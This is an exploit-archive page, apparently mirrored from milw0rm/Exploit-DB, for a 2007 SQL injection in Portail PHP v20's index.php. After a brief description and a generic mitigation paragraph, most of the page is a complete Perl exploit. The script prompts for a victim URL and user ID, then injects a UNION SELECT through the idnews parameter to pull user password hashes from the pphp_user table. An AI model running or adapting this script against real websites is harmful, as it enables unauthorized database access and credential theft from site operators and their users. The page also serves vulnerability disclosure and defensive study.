header-logo
Suggest Exploit
vendor:
Portail PHP
by:
xoron
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Portail PHP
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Portail PHP v20 (index.php) Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection attack on the Portail PHP v20 index.php file. The script prompts the user to select a language and then asks for the victim's website URL, path, and user ID. It then attempts to connect to the website and perform the SQL injection attack to retrieve user information, specifically the hashed password. If successful, it displays the user ID and hashed password. If unsuccessful, it displays an error message.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, keeping software up to date with the latest security patches can help prevent exploitation of known vulnerabilities.
Source

Exploit-DB raw data:

use LWP::Simple;
print "
Exploit Coded (c) by xoron
Portail PHP v20 (index.php) Remote SQL Injection Exploit
Languages: Turkish, English
Plz Select Language:";
$dil = <stdin>;
%eng = (
"site" => "Enter The Victim Without http://:",
"path" => "Plz Select Path:",
"id" => "Plz Select User ID:"
);
%turk = (
"site" => "Site Adi http:// ile baslayan:",
"path" => "Dizin:",
"id" => "ID: "
);
if($dil=~/^turkish$/i){
%dil = %turk;
}
elsif($dil=~/^english$/i){
%dil = %eng;
}
else{print "Undefined Language"; exit}
print $dil{site};
chop($site=<stdin>);
$site = "http://$site" if !($site=~/^http/);
print $dil{path};
chop($dir=<stdin>);
$dir = "/portailphp/" if !$dir;
print $dil{id};
chop($id =<stdin>);
$id = 2 if !$id;
print "Connecting to $site\n";
$sql = "index.php?affiche=Comment&act=lire&idnews=-1/**/union/**/select/**/0,";
$sql .= "1,2,US_pwd,4,5,6,7,8,9,10/**/from/**/pphp_user/**/where/**/US_uid=$id/*";
$get = get("$site$dir$sql");
if($get){
if($get=~/<td><strong>\&nbsp\;\&nbsp\;(.*?)<\/strong>/){
print "You are very Lucky Boy\nI Got Hash 4 ya\nID: $id\nHash: $1";
exit
}
elsif($get=~/<td><strong>(.*?)<\/strong>/){
print "Yep I got hash 4 ya\nID: $id\nHash: $1\n";
exit;
}
else{print "Exploit Failed\n";exit}
}
print "Connect Failed to $site\n";
exit;

# milw0rm.com [2007-03-22]